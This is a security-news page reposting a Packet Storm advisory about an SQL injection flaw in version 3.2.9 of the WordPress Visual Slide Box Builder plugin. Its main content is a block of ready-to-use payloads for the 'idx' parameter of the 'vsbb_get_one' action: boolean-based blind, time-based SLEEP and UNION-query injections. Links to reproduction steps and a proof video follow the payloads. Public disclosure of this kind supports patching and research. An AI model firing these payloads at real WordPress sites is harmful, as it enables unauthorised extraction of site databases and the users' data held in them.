Security
Headlines
HeadlinesLatestCVEs

Headline

WordPress Visual Slide Box Builder 3.2.9 SQL Injection

WordPress Visual Slide Box Builder plugin version 3.2.9 suffers from a remote SQL injection vulnerability.

Packet Storm
Open in Source
#sql#vulnerability#git#wordpress#auth
## Title: WordPress 6.0 - Visual Slide Box Builder 3.2.9 SQLi## Author: nu11secur1ty## Date: 07.11.2022## Vendor: https://wphive.com/## Software: https://wphive.com/plugins/wp-visual-slidebox-builder/?plugin_version=3.2.9## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin## Description:The parameter `idx` from the Visual Slide Box Builder plugin app forWordPress appears to be vulnerable to SQLi.The attacker can receive all database information from the WordPressdatabase and he can use it for very malicious purposes.[+] Payloads:```mysql---Parameter: idx (GET)    Type: boolean-based blind    Title: HAVING boolean-based blind - WHERE, GROUP BY clause    Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)HAVING 1854=1854    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)AND (SELECT 3837 FROM (SELECT(SLEEP(7)))QHbL)    Type: UNION query    Title: MySQL UNION query (NULL) - 6 columns    Payload: action=vsbb_get_one&idx=-5038 UNION ALL SELECTNULL,NULL,NULL,CONCAT(0x716a626a71,0x4e6b417358754d527a4a69544c57654a53574a64736b5a656e4b7968767a7a4d454243797a796d72,0x717a7a7a71),NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin)## Proof and Exploit:[href](https://streamable.com/jlp5sx)

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution
Packet Storm